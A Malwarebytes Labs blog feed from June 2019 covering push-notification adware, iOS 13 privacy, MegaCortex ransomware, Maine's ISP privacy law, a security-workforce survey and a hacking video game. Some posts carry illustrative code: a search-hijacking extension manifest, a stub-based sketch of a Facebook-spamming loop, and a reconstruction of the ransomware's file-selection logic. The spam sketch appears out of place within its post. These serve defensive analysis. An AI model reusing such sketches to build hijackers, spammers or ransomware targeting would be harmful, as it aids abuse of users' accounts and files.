Techie Feeds

Adware and PUPs families add push notifications as an attack vector

Malwarebytes - Thu, 06/13/2019 - 18:36

Some existing families of potentially unwanted programs (PUPs) and adware have added browser push notifications to their arsenal. Offering themselves up as browser extensions on Chrome and Firefox, these threats pose as useful plugins, then harass users with notifications.

A family of search hijackers

The first family I would like to discuss is a large set of Chrome extensions that were already active as search hijackers, but have now added a notifications service from a provider hailing from a domain blocked for fraud by Malwarebytes. In practice, that means you can now expect browser notifications inviting you to come gamble at an online casino, or advertisements for get-rich-quick schemes that use pictures of celebrities to gain your trust.

This family is detected under the PUP.Optional umbrella, meaning that Malwarebytes flags them for misconduct but recognizes they offer some kind of functionality and are upfront about the fact that they will change your search settings. The third part of Malwarebytes’ detection name usually refers to the name of the extension. So this one is called PUP.Optional.StreamAll.

The extensions in this family are search hijackers—they redirect users to Yahoo! search results when searching from the address bar. The websites behind all the extensions in this family are presented in three different styles that are completely interchangeable:

Version 1 is a basic design kindly guiding you through the steps of installing the Chrome extension.

Version 2 shows a circle that fills with color until it reaches 100 percent and then tells you it is ready to install the extension.

Version 3 is a bit more “in your face” and lets you know you really shouldn’t miss out on this extension. It does come in a few slightly different color schemes.

The three websites posted above all lead to StreamAll, the same Chrome extension that I have used as an example for this family. In fact, they all redirect to this extension in Chrome’s web store at some point:

A stunning number of users, which never ceases to amaze me.
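As background on the mechanism, Chrome extensions take over address-bar searches through the `chrome_settings_overrides` manifest key, which lets an extension register itself as the browser's default search provider. Below is a minimal, illustrative manifest sketch; the extension name and URLs are made up for illustration and are not taken from StreamAll:

```json
{
  "manifest_version": 2,
  "name": "Example Streaming Helper",
  "version": "1.0",
  "chrome_settings_overrides": {
    "search_provider": {
      "name": "Example Search",
      "keyword": "example",
      "search_url": "https://feed.example-hijacker.test/?q={searchTerms}",
      "favicon_url": "https://feed.example-hijacker.test/favicon.ico",
      "encoding": "UTF-8",
      "is_default": true
    }
  }
}
```

Hijackers typically point `search_url` at a feed they control, which then forwards the query to Yahoo! or another engine so the operators get paid per search.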

Another thing the members of this family have in common is a “thank you” screen after installing one of their extensions, already busy pushing promotional deals. This one has a blue background but can also be fully white.

Their offer to receive notifications is made as soon as you reach one of their sites:

These prompts have also been added to member sites of this family that didn’t promote push notifications earlier on.

If you accept this offer, you can find the resulting permission under the Settings menu > Advanced > Privacy and security > Site settings > Notifications.

The number of extensions in this family is rather large, but here is a list of removal guides I created for the most active ones at the moment of writing:

By active I mean they are being heavily promoted by some of the popular ad-rotators. To achieve this, they are probably paying a pretty penny and you can be sure they want to make good on that—at your expense.

A Facebook spammer

The second threat family I want to discuss is into far more serious business. This family of Firefox extensions is detected by Malwarebytes as Trojan.FBSpammer.

These extensions can be found at sites that try to convince users they need a Flash player update.

Prompts and links everywhere. What to do first?

They also ask for permission to send you notifications and—just like StreamAll—they use a provider that is blocked by Malwarebytes for fraud. But in this case, annoying push notifications are the least of users’ worries. As our friends at BleepingComputer figured out, this extension checks users’ Facebook connection and, if the user is logged in, the extension will join some Facebook groups on their behalf and start spamming them.

The extension checks every two seconds whether the user is connected to Facebook. If the user is logged in, the extension adds them to certain Facebook groups, then fetches a campaign and starts spamming those groups in the user’s name.

Lesson learned
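As a hedged illustration of the behavior described above, the reported logic boils down to a simple polling loop. All function names below are hypothetical stand-ins for what the extension does, not code lifted from it:

```python
import time

POLL_INTERVAL_SECONDS = 2  # the extension reportedly checks every two seconds

def spam_loop(is_logged_in, join_groups, fetch_campaign, post_spam, max_polls):
    """Sketch of the reported behavior: poll the Facebook session, and once
    the user is logged in, join groups and spam them with fetched content."""
    for _ in range(max_polls):
        if is_logged_in():
            groups = join_groups()         # join groups on the user's behalf
            campaign = fetch_campaign()    # pull spam content from a server
            for group in groups:
                post_spam(group, campaign) # post in the user's name
            return True
        time.sleep(POLL_INTERVAL_SECONDS)
    return False
```

In a real extension this would run as background-page code on a timer; the sketch just makes the two-second poll and the login gate explicit.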

While browser push notifications can be annoying, they are easy to resolve, as I explained in detail in my blog Browser push notifications: a feature asking to be abused. But we have seen from the examples above that there are worse things.

Choose carefully which extensions you decide to install, as well as which programs you allow to send push notifications. The extensions in these cases are up to no good—especially the Trojan that will give your Facebook reputation a quick shove into the cellar. And if you have trouble determining which extensions are benign and which are taking advantage of users, you can always count on Malwarebytes to point you in the right direction.

Stay safe, everyone!

The post Adware and PUPs families add push notifications as an attack vector appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Apple iOS 13 will better protect user privacy, but more could be done

Malwarebytes - Wed, 06/12/2019 - 16:42

Last week, Apple introduced several new privacy features to its latest mobile operating system, iOS 13. The Internet, predictably, expressed doubt, questioning Apple’s oversized influence, its exclusive pricing model that puts privacy out of reach for anyone who can’t drop hundreds of dollars on a mobile phone, and its continued, near-dictatorial control of the App Store, which can, at a moment’s notice, change the rules to exclude countless apps.

At Malwarebytes, we sought to answer something different: Do the new iOS features actually provide meaningful privacy protections?

The short answer from multiple digital rights and privacy advocates is: “Yes, but…”

For example: Yes, but Apple’s older phones should not be excluded from the updates. Also: Yes, but Apple’s competitors are not likely to follow. And more broadly: Yes, but Apple is giving users a convenient solution that does not address a core problem with online identity.

Finally: Yes, but Apple can go further.

Apple’s new single sign-on feature

At Apple’s WWDC19 conference in San Jose last week, Senior Vice President of Software Engineering Craig Federighi told audience members that the latest iOS would give Apple users two big privacy improvements: better protection when signing into third-party services and apps, and more options to restrict location tracking.

Apple’s Single Sign-On (SSO) option will allow users to sign into third-party platforms and apps by using their already-created Apple credentials. Called “Sign in with Apple,” Federighi described the feature not so much as a repeat of similar features provided by competitors Google and Facebook, but as a response.

Standing before a projected display of two separate blue rectangles, one reading “Sign in with Facebook,” the other “Sign in with Google,” Federighi told the audience, “We’ve all seen buttons like this.”

While convenient, Federighi said, these features can also compromise privacy, as “your personal information sometimes gets shared behind the scenes, and these logins can be used to track you.” Behind Federighi, the presentation revealed all the types of information that get shuffled around without a user’s full understanding: Full names, gender, email addresses, events attended, locations visited, hometown, social posts, and shared photos and videos.

Federighi said “Sign in with Apple” locks that data dispersal down.

“Sign in with Apple” lets Apple users log into third-party apps and services by using the Face ID or Touch ID credentials created on their device. The SSO feature also gives Apple users the option to provide third parties with “relay” email addresses—randomly-generated email addresses created by Apple that serve as forwarding addresses, giving users the option to keep private their personal email address while still receiving promotional deals from a company or service. Further, relay addresses will not be repeated, and Apple will generate a new relay for each new platform or app.
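Conceptually, the relay scheme is just a per-app, non-repeating forwarding alias. Here is a toy sketch of the idea; it is not Apple's actual implementation, whose address format and internals are private, and the domain is made up:

```python
import secrets

class RelayDirectory:
    """Toy model of per-app relay addresses: each app gets its own randomly
    generated alias that forwards mail to the user's real address."""

    def __init__(self, real_address):
        self.real_address = real_address
        self.aliases = {}  # app name -> relay address

    def relay_for(self, app):
        # Reuse the existing alias for a known app; mint a fresh one otherwise,
        # so no two apps ever see the same address.
        if app not in self.aliases:
            self.aliases[app] = f"{secrets.token_hex(8)}@relay.example.com"
        return self.aliases[app]

    def forward(self, relay_address, message):
        # Mail sent to any valid alias reaches the real address; the sender
        # never learns what that real address is.
        if relay_address in self.aliases.values():
            return (self.real_address, message)
        return None
```

The privacy win is that a data broker who buys mailing lists from two different apps cannot join them on the email column, because each app only ever saw its own alias.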

Apple iOS 13 gives users the option to both share and hide their email from third-party apps when utilizing the company’s single sign-on feature. Courtesy: Apple

Privacy advocates welcomed the feature but warned about over-reliance on Apple as the one true purveyor of privacy.

“Apple’s new sign-in service is definitely a step in the right direction, but it’s important to understand who it’s protecting you from,” said Gennie Gebhart, associate director of research at Electronic Frontier Foundation. “In short, this kind of feature protects you from all sorts of scary third parties but does not necessarily protect you from the company offering it—in this case, Apple.”

Apple has scored positively with EFF’s annual “Who Has Your Back” report, which, for years, evaluated major tech companies for their willingness to fight overbroad, invasive government requests for user data.

But protecting user data from government requests and protecting it from corporate surveillance are different things.

Luckily, Gebhart said, Apple has promised not to use the information it gleans from its SSO feature to track user activity or build profiles from online behavior. But, Gebhart said, the same can’t be assumed from other big tech companies including Google and Facebook.

“[I]t’s important to remember for other SSO services like Facebook’s and Google’s that, even if they implement cool privacy-protective features like Apple has, that won’t necessarily protect you from Facebook or Google tracking your activity,” Gebhart said.

As to whether those companies will actually follow in Apple’s footsteps, Nathalie Maréchal, a senior research analyst at Ranking Digital Rights, seems doubtful, as those competitors rely on entirely different business models.

“Google, Apple’s main competitor in the smartphone market, relies on pervasive data collection at a massive scale not only to sell advertising, but also to train the algorithms that power its products, such as Google Maps,” Maréchal said. “That’s why Google collects as much data as it possibly can: that data is the raw material for its products and services. I don’t see Google shifting to a model where it collects as little information as possible—as Apple says it does—anytime soon.”

That said, Maréchal still commended Apple for offering relay email addresses in its SSO feature.

“This makes the process much more user-friendly, and makes it even harder for data brokers and advertising networks to connect all of someone’s online activity and create a detailed file about them,” Maréchal said.

Yet another researcher, who said it was good to see Apple taking “practical steps” to protect online identities, warned about a larger problem: The increased dependence on a user’s identity as the de facto credential for accessing all sorts of online services and platforms.

“We are seeing more and more websites and apps pushing us to identify ourselves; while sometimes this may be appropriate, it comes along with dangers,” said Tom Fisher, a researcher at Privacy International. “It can be a tool for tracking people across sessions, for instance.”

Fisher continued: “There’s a need for more thought not only on how identification systems can protect people’s privacy, but also when it is appropriate to ask people to identify themselves at all.”

Apple’s new option for location privacy

Apple’s second big feature will give its users the option to more closely manage how their location is tracked by various third-party apps.

With the update to iOS 13, users can choose to share their location “just once” with an app. That means that, if users choose, any service that requests location information—whether it be Yelp when recommending nearby restaurants, Uber when finding nearby drivers, or Fandango when locating nearby movie theaters—will be allowed to access that information just once, and every subsequent request for location information must be approved by the user on an individual basis.

Maréchal called this an important development. She said many apps that request location information provide convenient services for users, and users should have the option to choose between that convenience and that potential loss of privacy. That decision, she said, is unique to each user.

“That’s a very contextual decision and I’m glad to hear that Apple is giving its users more nuanced options than simply ‘on,’ ‘off,’ or ‘only when the app is in use,’” Maréchal said. “For example, I might not want to share my location with Yelp while checking opening hours for a business in my home city, because the privacy trade-off isn’t worth it, and then might share my location while traveling the following week because I don’t know the city I’m visiting well enough to know how far a restaurant is from me.”

Further steps?

When interviewed for this piece, every researcher agreed: Apple’s newest features provide simple, easy-to-use options that can leave users more informed and more in control of their online privacy.

However, another response came up more than once: Apple can—and should—go further.

These responses are not unusual, and, in fact, they follow in the footsteps of all advocacy work, particularly in online privacy. Earlier this year, it was Mozilla, the privacy-forward, nonprofit developer of the web browser Firefox, that asked Apple to do better by its users in protecting them from invasive online tracking. Similarly, it is privacy advocates and researchers who have the most thought-out ideas on protecting user privacy. These researchers had a few ideas for Apple.

First, Maréchal said, Apple should provide “transparency” reports—the way it already does for the government requests it receives for user data—that disclose how third-party apps collect Apple users’ information. She said Apple’s marketing tagline (“What happens on your iPhone, stays on your iPhone”) is only true for the data Apple itself collects, “but it’s not true of data collected by third party apps.”

A Washington Post article last month revealed this to an alarming degree:

“On a recent Monday night, a dozen marketing companies, research firms and other personal data guzzlers got reports from my iPhone. At 11:43 p.m., a company called Amplitude learned my phone number, email and exact location. At 3:58 a.m., another called Appboy got a digital fingerprint of my phone. At 6:25 a.m., a tracker called Demdex received a way to identify my phone and sent back a list of other trackers to pair up with.”

Fisher raised a separate issue regarding Apple’s security updates: Who gets left behind? At such a high price point for the devices (The oldest iPhone model for sale on Apple’s website that is iOS 13 compatible, the Apple iPhone 7, starts at $449), Fisher said, “What happens to people who can’t afford Apple’s expensive products: Are they then left only with access to more invasive ways of identifying themselves?”

Another one of Maréchal’s suggestions could address that problem.

“I would also like some clarity about how long a new iPhone will be guaranteed to receive software updates, as well as a commitment to providing security updates specifically for at least five years,” Maréchal said. “Given how expensive new iPhones can be, customers should know how long the device will be safe to use before they purchase it.”

While this idea does not fix Fisher’s concerns, it at least gives users a better understanding about what they can expect for their own privacy years later. Any company’s decision to put users in more control of their privacy rights is a decision we can sign onto.

The post Apple iOS 13 will better protect user privacy, but more could be done appeared first on Malwarebytes Labs.

MegaCortex continues trend of targeted ransomware attacks

Malwarebytes - Wed, 06/12/2019 - 16:03

MegaCortex is a relatively new ransomware family that continues the 2019 trend of threat actors developing ransomware specifically for targeted attacks on enterprises. While GandCrab has apparently shut its doors, several other bespoke, artisanal ransomware families have taken its place, including RobinHood (which shut down the city of Baltimore), Troldesh, and CrySIS/Dharma.

Detected by Malwarebytes as Ransom.MegaCortex, MegaCortex saw a spike in business detections in late May and has since slowed down to a trickle, following a trend similar to its Troldesh and CrySIS forebears.

Our anti-ransomware technology detected Ransom.MegaCortex even before definitions were added.


The methods of distribution for MegaCortex are still not completely clear, but there are indications that the ransomware is dropped on compromised computers by using Trojan downloaders. Once a corporate network has been compromised, the attackers try to gain access to a domain controller and spread across the entire network from there.

Suspected Trojans that might be responsible for the distribution of MegaCortex are Qakbot aka Qbot, Emotet, and Rietspoof. Rietspoof is a multi-stage malware that spreads through instant messaging programs.


Before the actual ransomware process starts, several tools and scripts are deployed to disable certain security processes and attempt to gain access to the domain controller so the ransomware can be distributed across the network.

Once the ransomware process is activated, it creates these files:

  • ********.log
  • ********.tsv
  • ********.dll

The ******** represents eight random characters that are identical for all three files on the affected system. These names are also mentioned in the ransom note, called !!!_READ_ME_!!!.txt.

The ransom note, the log file, and the tsv file are all located in the root drive. The dll, on the other hand, can be found in the %temp% folder.
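To illustrate the naming scheme described above, the three artifacts share a single random eight-character stem. This is a sketch of the pattern, not the malware's own code; the exact character set it draws from is an assumption here:

```python
import random
import string

def megacortex_style_names():
    """Sketch of the reported naming scheme: one random eight-character
    stem shared by the .log, .tsv, and .dll artifacts.
    (Lowercase letters are an assumption for illustration.)"""
    stem = "".join(random.choices(string.ascii_lowercase, k=8))
    return [f"{stem}.log", f"{stem}.tsv", f"{stem}.dll"]
```

Because the stem is identical across all three files (and is echoed in the ransom note), it is a handy pivot when hunting for the infection's artifacts on a system.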

The encrypted files are given the extension .aes128ctr. The encryption routine skips files with the extensions:

  • .aes128ctr
  • .bat
  • .cmd
  • .config
  • .dll
  • .exe
  • .lnk
  • .manifext
  • .mui
  • .olb
  • .ps1
  • .sys
  • .tlb
  • .tmp

The routine also skips the files:

  • desktop.ini
  • ********.tsv
  • ********.log

It also skips all the files and subfolders under %windir%, with the exception of %windir%\temp. In addition, MegaCortex deletes all the shadow copies on the affected system.
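Putting the skip rules above together, the file-selection logic can be sketched like this. It is a reconstruction from the described behavior, not decompiled code, and the path normalization is deliberately simplified:

```python
# Extensions the encryption routine reportedly leaves alone.
SKIP_EXTENSIONS = {
    ".aes128ctr", ".bat", ".cmd", ".config", ".dll", ".exe", ".lnk",
    ".manifext", ".mui", ".olb", ".ps1", ".sys", ".tlb", ".tmp",
}

def should_encrypt(path, stem="abcdefgh", windir="c:/windows"):
    """Return True if a file would be touched by the described routine.
    `stem` stands in for the random eight-character name of the
    malware's own .tsv/.log files."""
    p = path.replace("\\", "/").lower()
    name = p.rsplit("/", 1)[-1]
    ext = "." + name.rsplit(".", 1)[-1] if "." in name else ""
    if ext in SKIP_EXTENSIONS:
        return False
    if name in {"desktop.ini", f"{stem}.tsv", f"{stem}.log"}:
        return False
    # Everything under %windir% is skipped, except %windir%\temp.
    if p.startswith(windir + "/") and not p.startswith(windir + "/temp/"):
        return False
    return True
```

Note the practical logic behind the list: skipping executables, DLLs, and most of %windir% keeps the machine bootable, so the victim can still read the ransom note and pay.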

After the encryption routine is complete, MegaCortex displays this rather theatrical ransom note, high on drama and low on grammatical correctness.

Remarkable ransom note quotes

Some notable quotes from the ransom note:

  • “All of your computers have been corrupted with MegaCortex malware that has encrypted your files.” So the name MegaCortex comes from the threat actors themselves, as opposed to the security researchers who discovered it. (That is one way to help the industry use a unified detection name.)
  • “It is critical that you don’t restart or shutdown your computer.” This implies that one of the seeds for the encryption routine will be made irretrievable if the computer gets rebooted.
  • “The software price will include a guarantee that your company will never be inconvenienced by us.” Is this a tell-tale sign about how much granular control the threat actors have over the malware attacks, or just another empty promise made by criminals?
  • “We can only show you the door. You’re the one who has to walk through it.” A reference to The Matrix or a failed fiction writer?

The ransom note also makes clear that the information necessary for the decryption routine is contained in the randomly named tsv file. So, if all the information except the private key is on the infected computer, does that mean there will be a free decryptor soon? That depends on many other factors, but if the cybercriminals used the same private key for each infection, there could be a possible escape on the horizon.

Undoubtedly it will take some reverse engineering to get definitive answers to these questions, but it certainly gives us some clues.
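The .aes128ctr extension points at AES-128 in CTR (counter) mode. CTR mode turns a block cipher into a stream cipher: a keystream is derived from a key and a per-file nonce/counter and XORed with the data, so decryption is the exact same XOR and needs exactly that key material. The toy sketch below shows the shape of the mode using SHA-256 as a stand-in keystream generator, since the Python standard library has no AES; it is emphatically not the malware's cipher:

```python
import hashlib

def ctr_keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Toy CTR keystream: hash(key || nonce || counter) per block.
    Real AES-CTR encrypts the counter block with AES instead of hashing."""
    stream = b""
    counter = 0
    while len(stream) < length:
        block = hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
        stream += block
        counter += 1
    return stream[:length]

def ctr_xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    # Encryption and decryption are the same operation in CTR mode.
    ks = ctr_keystream(key, nonce, len(data))
    return bytes(a ^ b for a, b in zip(data, ks))
```

This symmetry is why the key material referenced in the tsv file matters so much: whoever holds it (or the private key protecting it) can run the same operation in reverse and recover the files.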


Given that the exact infection vector is as yet unknown, it is hard to give specific protection advice for this ransomware family. But there are some countermeasures that always apply to ransomware attacks, and they are worth repeating here:

  • Scan emails with attachments. Suspicious mails with attachments should not reach the end user without being checked first.
  • User education. Users should be taught to refrain from downloading attachments sent to them via email or instant messaging without close scrutiny.
  • Blacklisting. Most endpoints do not need to be able to run scripts. In those cases, you can blacklist wscript.exe and perhaps other scripting hosts like PowerShell.
  • Update software and systems. Updating your systems and your software can plug up vulnerabilities and keep known exploits at bay.
  • Back up files. Reliable and easy-to-deploy backups can shorten the recovery time.

We are far from knowing everything there is to know about this ransomware, but as we discover new information, we will keep our blog readers updated. In the meantime, it is imperative for enterprises to employ best practices for protecting against all ransomware.

After all, we can only show you the door. You’re the one who has to walk through it.

Stay safe, everyone!

The post MegaCortex continues trend of targeted ransomware attacks appeared first on Malwarebytes Labs.

Maine governor signs ISP privacy bill

Malwarebytes - Tue, 06/11/2019 - 16:57

Less than one week after Maine Governor Janet Mills received one of the nation’s most privacy-protective state bills on her desk, she signed it into law. The move makes Maine the latest US state to implement its own online privacy protections.

The law, which will go into effect July 1, 2020, blocks Internet service providers (ISPs) from selling, sharing, or granting third parties access to their customers’ data unless explicitly given approval by those customers. With the changes, Maine residents now have an extra layer of protection for the emails, online chats, browser history, IP addresses, and geolocation data that is commonly collected and stored by companies like Verizon, Comcast, and Spectrum.

In signing the bill, Governor Mills said the people of Maine “value their privacy, online and off.”

“The Internet is a powerful tool, and as it becomes increasingly intertwined with our lives, it is appropriate to take steps to protect the personal information and privacy of Maine people,” said Governor Mills in a released statement. “With this common-sense law, Maine people can access the Internet with the knowledge and comfort that their personal information cannot be bought or sold by their ISPs without their express approval.”

The bill, titled “An Act to Protect the Privacy of Online Customer Information,” was introduced earlier this year by its sponsor, Democratic state Senator Shenna Bellows. It passed through the Maine Legislature’s Committee on Energy, Utilities, and Technology, and gained approval in both the House of Representatives and the Senate soon after. Given until June 11 to sign the bill into law, Governor Mills moved quickly, giving her signature on June 6.

As Maine’s lawmakers worked to review and slightly amend the bill (adding a start date to go into effect), it picked up notable supporters, including ACLU of Maine and GSI Inc., a local, small ISP in the state. In an opinion piece published in Bangor Daily News, GSI’s chief executive and chief operating officer voiced strong support for online privacy, saying that “if people can’t trust the Internet, then the value of the Internet is significantly lessened.”

The Maine State Chamber of Commerce opposed the bill, arguing that a new state standard could confuse Maine residents. The Chamber also said the bill was too weak because it did not extend its regulations to some of the Internet’s most noteworthy privacy threats—Silicon Valley companies, including Facebook and Google.

The ACLU of Maine and the Maine State Chamber of Commerce did not return requests for comment about the Governor’s signing.

Sen. Bellows, in the same statement referenced above, commended Maine’s forward action.

“Mainers need to be able to trust that the private data they send online won’t be sold or shared without their knowledge,” Sen. Bellows said. “This law makes Maine first and best in the nation in protecting consumer privacy online.”

The post Maine governor signs ISP privacy bill appeared first on Malwarebytes Labs.

Cybersecurity pros think the enemy is winning

Malwarebytes - Tue, 06/11/2019 - 15:00

There is a saying in security that the bad guys are always one step ahead of defense. Two new sets of research reveal that the constant cat-and-mouse game is wearing on security professionals, and many feel they are losing the war against cybercriminals.

The first figures are from the Information Systems Security Association (ISSA) and industry analyst firm Enterprise Strategy Group (ESG). The two polled cybersecurity professionals and found 94 percent of respondents believe that cyber adversaries have a big advantage over cyber defenders—and the balance of power is with the enemy. Most think that advantage will eventually pay off for criminals, as 91 percent believe that most organizations are extremely vulnerable, or somewhat vulnerable, to a significant cyberattack or data breach.

This mirrors Malwarebytes’ own recent research, in which 75 percent of surveyed security professionals admitted that they believe they could be breached in the next one to three years.

What’s behind this defeatist mindset?

In a blog post on the ESG/ISSA research, Jon Oltsik, principal analyst at ESG, says the lack of confidence exists in part because criminals are well organized, persistent, and have the time to fail and try a new strategy in order to infiltrate a network. Meanwhile, security managers are always busy and always playing catch-up.

The skills shortage that is impacting the security field is compounding the sense of vulnerability among organizations. ESG found 53 percent of organizations report a problematic shortage of cybersecurity skills, and 63 percent of organizations continue to fall behind in providing an adequate level of training for their cybersecurity professionals.

“Organizations are looking at the cybersecurity skills crisis in the wrong way: It is a business, not a technical, issue,” said ISSA International President Candy Alexander in response to findings. “In an environment of a ‘seller’s market’ with 77 percent of cybersecurity professionals solicited at least once per month, the research shows in order to retain and grow cybersecurity professionals at all levels, business leaders need to get involved by building a culture of support for security and value the function.”

Where do we go from here?

An entirely new perspective on addressing risk mitigation is required to turn this mindset around. As Alexander notes, security is a business issue, and it needs attention at all levels of the organization.

But the research shows it doesn’t get the respect it deserves, as 23 percent of respondents said business managers don’t understand and/or support an appropriate level of cybersecurity. Business leaders need to send a clear message that cybersecurity is a top priority and invest in security tools and initiatives in turn to reflect this commitment.

This approach is well-supported by research. In fact, a recent report from Deloitte and the Financial Services Information Sharing and Analysis Center (FS-ISAC) finds top-performing security programs have one thing in common: They have the attention of executive and board leadership, which also means security is seen as a priority throughout the organization.

ESG/ISSA makes other recommendations for changing the thinking about security. They include:

CISO elevation: CISOs and other security executives also need an increased level of respect and should be expected to engage with executive management. Regular audience with the board is critical to getting security the visibility it requires organization-wide.

Practical professional development for security pros: While 93 percent of survey respondents agree that cybersecurity professionals must keep their skills up to date, 66 percent claim that cybersecurity job demands often prevent them from taking part in skills development. Respondents also noted that certifications do not hold as much value on the job, with 57 percent saying many credentials are far more useful in getting a job than in doing one. The report suggests prioritizing practical skills development over certifications.

Develop security talent from within: Because the skills gap makes hiring talent more challenging, 41 percent of survey respondents said that their organization has had to recruit and train junior personnel rather than hire more experienced infosec professionals. This is also a creative way to deal with a dearth of qualified talent.

The report recommends designing an internal training program that will foster future talent and loyalty. It also suggests that casting a wider net beyond IT, looking for transferable business skills, and supporting cross-career transitions will help expand the pool of talent.

While the overall picture suggests that security progress in business is slow, adjustments in approach and prioritization can go a long way in raising the security program’s profile throughout the organization. With more time, attention, and respect given to security strategy and risk mitigation, defense in the future can be a step ahead of the cybercriminal instead of woefully behind.

The post Cybersecurity pros think the enemy is winning appeared first on Malwarebytes Labs.

A week in security (June 3 – 9)

Malwarebytes - Mon, 06/10/2019 - 17:30

Last week on Malwarebytes Labs, we rounded up some leaks and breaches, reported about Magecart skimmers found on Amazon CloudFront CDN, proudly announced we were awarded Best Cybersecurity Vendor Blog at the annual EU Security Blogger Awards, discussed how Maine inches closer to shutting down ISP pay-for-privacy schemes, asked where our options to disable hyperlink auditing had gone, and presented our look at video game portrayals of hacking: NITE Team 4.

Other cybersecurity news
  • At Infosecurity Europe, a security expert from Guardicore discussed a new cryptomining malware campaign called Nanshou, and why the cryptojacking threat is set to get worse. (Source: Threatpost)
  • A security breach at a third-party billing collections firm exposed the personal and financial data of as many as 7.7 million customers of medical testing giant LabCorp. (Source: Cnet)
  • A researcher has created a module for the Metasploit penetration testing framework that exploits the critical BlueKeep vulnerability on vulnerable Windows XP, 7, and Server 2008 machines to achieve remote code execution. (Source: BleepingComputer)
  • Microsoft’s security researchers have issued a warning about an ongoing spam wave spreading emails that carry malicious RTF documents, which infect users with malware as soon as they are opened, without further user interaction. (Source: ZDNet)
  • The Federal Trade Commission has issued two administrative complaints and proposed orders which prohibit businesses from using form contract terms that bar consumers from writing or posting negative reviews online. (Source:
  • Security researchers have discovered a new botnet that has been attacking over 1.5 million Windows systems running a Remote Desktop Protocol (RDP) connection exposed to the Internet. (Source: ZDNet)
  • Microsoft has deleted a massive database of 10 million images which was being used to train facial recognition systems. The database is believed to have been used to train a system operated by police forces and the military. (Source: BBC news)
  • On Tuesday, the Government Accountability Office (GAO) said that the FBI’s Facial Recognition office can now search databases containing more than 641 million photos, including 21 state databases. (Source: NakedSecurity)
  • Despite sharing a common Chromium codebase, browser makers like Brave, Opera, and Vivaldi don’t have plans on crippling support for ad blocker extensions in their products—as Google is currently planning on doing within Chrome. (Source: ZDNet)
  • Traffic destined for some of Europe’s biggest mobile providers was misdirected in a roundabout path through the Chinese-government-controlled China Telecom on Thursday, in some cases for more than two hours. (Source: ArsTechnica)

Stay safe, everyone!

The post A week in security (June 3 – 9) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Video game portrayals of hacking: NITE Team 4

Malwarebytes - Fri, 06/07/2019 - 16:52

Note: The developers of NITE Team 4 granted the blog author access to the game plus DLC content.

A little while ago, an online acquaintance of mine asked if a new video game based on hacking called NITE Team 4 was in any way realistic, or “doable” in terms of the types of hacking it portrayed (accounting for the necessary divergences from how things would work outside of a scripted, plot-goes-here environment).

The developers, AliceandSmith, generously gave me a key for the game, so I’ve spent the last month or so slowly working my way through the content. I’ve not completed it yet, but what I’ve explored is enough to feel confident in making several observations. This isn’t a review; I’m primarily interested in the question: “How realistic is this?”

What is it?

NITE Team 4 is an attempt at making a grounded game focused on a variety of hacking techniques—some of which researchers of various coloured hats may (or may not!) experience daily. It does this by allowing you full use of the so-called “Stinger OS,” their portrayal of a dedicated hacking system able to run queries and operate advanced hacking tools as you take the role of a computer expert in a government-driven secret organisation.

Is it like other hacking games?

Surprisingly, it isn’t. I’ve played a lot of hacking games through the years. They generally fall into two camps. The first is the terrible mini-game jammed into an unrelated title, bearing no resemblance to hacking in any way whatsoever. You know what I’m talking about: They’re the bits flagged as “worst part of the game” whenever you talk to a friend about any form of digital entertainment.

The second camp is the full-fledged hacking game, built entirely around hacking as its core premise. The quality is variable, but these titles often have a specific look and act a certain way.

Put simply, the developers usually emigrate to cyberpunk dystopia land and never come back. Every hacker cliché in the book is wheeled out, and as for the actual hacking content, it usually comes down to abstractions of what the developer assumes hacking might be like, rather than something that it actually resembles.

In other words: You’re not really hacking or doing something resembling hacking. It’s really just numbers replacing health bars. Your in-game computer is essentially just another role-playing character, only instead of a magic pool you have a “hacking strength meter” or something similar. Your modem is your stamina bar, your health bar is replaced by something to do with GPU strength, and so on.

They’re fun, but it’s a little samey after a while.

Meanwhile, in NITE Team 4: I compromised Wi-Fi enabled billboards to track the path of the potentially kidnapped owner of a mobile phone.

Click to enlarge

I used government tools to figure out the connection between supposedly random individuals by cross referencing taxi records and payment stubs. I figured out which mobile phone a suspect owns by using nearby Wi-Fi points to build a picture of their daily routine.

Click to enlarge

I made use of misconfigured server settings to view ID cards belonging to multiple companies looking for an insider threat.

I performed a Man-in-the-Middle attack to sniff network traffic and made use of the Internet of Things to flag a high-level criminal suspect on a heatmap.

Click to enlarge

If it sounds a little different, that’s because it is. We’re way beyond the old “Press H to Hack” here.

Logging on

Even the title screen forced me to weigh up some serious security choices: Do I allow the terminal to store my account username and password? Will there be in-game repercussions for this down the line? Or do I store my fictitious not-real video game login in a text file on my very-real desktop?

Click to enlarge

All important decisions. (If you must know, I wrote the password on a post-it note. I figure if someone breaks in, I have more pressing concerns than a video game login. You’re not hacking my Gibson, fictitious nation state attackers).

Getting this show on the road

Your introduction to digital shenanigans isn’t for the faint of heart. As with many games of this nature, there’s a tutorial—and what a tutorial.

Spread across three sections covering basic terminal operations, digital forensics, and network intrusion, there are no fewer than 15 specific tutorials, and each of those contains multiple components.

I can’t think of any other hacking-themed game where, before I could even consider touching the first mission, I had to tackle:

Basic command line tools, basic and advanced OSINT (open source intelligence), mobile forensics, Wi-Fi compromise, social engineering via the art of phishing toolkits, MiTM (Man in the Middle), making use of exploit databases, and even a gamified version of the infamous NSA tool Xkeyscore.

When you take part in a game tutorial that suggests users of Kali and Metasploit may be familiar with some aspects of the interface, or happily links to real-world examples of tools and incidents, you know you’re dealing with something that has a solid grounding in “how this stuff actually works.”

Click to enlarge

In fact, a large portion of my time was spent happily cycling through the tutorial sections and figuring out how to complete each mini objective. If you’d told me the entire game was those tutorials, I’d probably have been happy with that.

What play styles are available?

The game is fairly aligned to certain types of Red Team actions, primarily reconnaissance and enumeration. You could honestly just read an article such as this and have a good idea of how the game is expected to pan out. Now, a lot of other titles do this to some degree. What’s novel here is the variety of approaches on offer to the budding hacker.

There are several primary mission types. The first is the (so far) four-chapter main mission story, which seems to shape at least certain aspects based on choices made earlier on. This is where the most…Hollywood?…aspects of the story surrounding the hacking seem to reside. In fairness, the developers do assign a “real life” rating to each scenario, and most of them tend to err on the side of “probably not happening,” which is fair enough.

The second type of mission is the daily bounties, where various government agencies offer you rewards for hacking various systems or gathering intel on specific targets. I won’t lie: The interface has defeated me here, and I can’t figure out how to start one. It’s probably something incredibly obvious. They’ll probably make me turn in my hacker badge and hacker gun.

